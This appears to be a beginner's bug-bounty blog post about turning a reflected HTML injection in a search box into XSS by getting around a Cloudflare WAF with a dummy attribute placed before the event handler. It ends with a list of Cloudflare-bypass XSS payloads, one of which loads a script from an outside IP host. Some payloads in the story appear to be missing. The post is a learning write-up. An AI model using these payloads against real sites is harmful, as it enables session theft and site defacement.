My first valid bug finding ( HTMLi to XSS by bypassing clouflare ) __ Frozen Flame

How I got my first bug ?

Hello thirsty learners. Recently I got my first bug in a private programme. Actually that was a Vulnerability Disclosure Programme. So, I can't say anything about it. And, unluckily I got duplicate in my submission. But, 1st bug is 1st bug. Let's talk about how I got it .

Just like a random day, I was visiting the groups. And I saw an XSS challenge which was given by one of my friend. The main challenge was to bypass the cloud flare . So, let's start....

Finding a target point & testing vulnerability

As you know, I have got no pc . I just do all of my stuffs with my Android phone. So, i can't use burp suite or any proxy to find the parameters. So normally I searched for the vulnerability in the search box. I put my payload there. My payload was ,


The string was reflecting in the webpage [ <t> wasn't reflecting as it is may be getting counted as a tag and got executed in the web application ]. So I got this ,

I think, it is not filtering my input, as it counts <t> . But, still I am not sure is it getting filtered or not. So I searched for my payload in the view source. 

I found it in 3 different places. Almost everywhere it was getting filtered. 

But, in one point i found this,

Right now, I am 100% sure that , this web app is vulnerable to Cross Site Scripting Attack. As there is no filter in this point. So, at first, I tried to do HTML Injection attack using this payload ,

<br><font color="red">hacked by frozenflame</font>

And the result was the expected one. This web application is vulnerable to HTML Injection .

Now, my part is to make it turn towards XSS. So, I gave my payload in the search box. Payload,

A white space was created due to this payload. That means, it got executed. Now my time to check if there is any blocked things. So, I gave this full payload,

<svg onload=alert(1)>

And unlucky I faced this ,

Oops cloud flare. Let's search for the blocked string(s). So, I made some changes in the event handler. Like this, <svg onloadd=alert(1)> . See the payload carefully it's not onload it's onloadd . And I got this ,

Well, that means this application's firewall only works in the event handler. So, I used this payload, <svg ontest="xss" onload=alert(1)>. And i got an XSS.


Ok. Now let me say something about JavaScript. JavaScript reads each line. If the 1st line is correct, it goes for the 2nd line. So, there was a possibility that, the web app searches for a correct event handler after the tag's name. Just like, <svg onload> . If it finds any correct event handler after the tag's name, it blocks the script. So what if we use an event handler after the tag's name that doesn't even exist so our web application won't trigger the firewall as there is no accurate event handler after the tag's name. So, that's how, we can bypass it pretty easily. 

Some payload for bypassing the cloud flare protection 

<a"/onclick=(confirm)()>Click Here!

Dec: <svg onload=prompt%26%230000000040document.domain)>

Hex: <svg onload=prompt%26%23x000000028;document.domain)>

xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>

<--`<img/src=` onerror=confirm``> --!>

<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>

<--`<img/src=` onerror=confirm``> --!>

<--%253cimg%20onerror=alert(1)%20src=a%253e --!>


javascript:{ alert`0` }


<img src=x onError=import('//1152848220/')>


<svg on onload=(alert)(document.domain)>

<img ignored=() src=x onerror=alert(1)>

In another tutorial till then, 
Happy hacking. 👻